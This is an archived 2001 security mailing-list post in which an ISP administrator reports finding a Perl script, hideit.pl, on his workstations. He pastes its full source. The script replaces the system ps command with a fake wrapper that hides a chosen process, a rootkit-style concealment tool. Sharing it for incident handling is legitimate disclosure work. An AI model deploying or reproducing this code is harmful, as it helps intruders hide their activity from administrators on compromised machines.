hi..i'm an admin of a small isp i found this program on all my workstation
it was called hideit.pl it seems to hide any program from ps!
#This little perl script will replace the ps program with a fake ps #that
#doesn't show the program u want to hide, the original ps replaced #will be
saved
#in /bin/ps.bak and can be restored by running:ps2.pl Restore
#stupid but usefull!;)
#by SLACKo from Dalnet
#!/usr/bin/perl
if ($#ARGV<0) {die "Usage : $0 Program (To hide a program from ps) or
$0 Restore (To restore ps)\n"};
$eshta = `whereis ps` =~ /^\S+:\s+(\S+)/;$new=$1;
restore() if ($ARGV[0] eq "Restore");
system("cp $new /bin/ps.bak") if (! -f '/bin/ps.bak');
open(HH,">$new") or die "$!\n";
$string = <<"EOF";
#!/usr/bin/perl
open(PS,"/bin/ps.bak \$ARGV[0]|") or die "$!\n";
while (<PS>) {
s/perl(.*)bin(.*)/ps \$ARGV[0]/g;
next if (/($ARGV[0]|ps.bak)/);
print;}
EOF
print HH "$string";close(HH,PS);
sub restore {system("cp /bin/ps.bak $new");exit;}
_________________________________________________________________
Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Sun Aug 12 2001 - 16:48:53 PDT